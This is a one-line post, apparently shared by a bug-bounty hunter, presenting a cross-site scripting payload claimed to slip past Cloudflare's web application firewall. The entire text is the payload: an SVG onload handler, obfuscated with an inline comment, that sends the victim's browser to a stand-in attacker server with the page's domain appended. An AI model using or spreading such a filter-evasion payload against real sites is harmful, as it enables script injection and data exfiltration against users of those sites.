A payload to bypass Cloudflare, by @stealthybugs
<svg/onload=location/**/=’https://your.server/’+document.domain>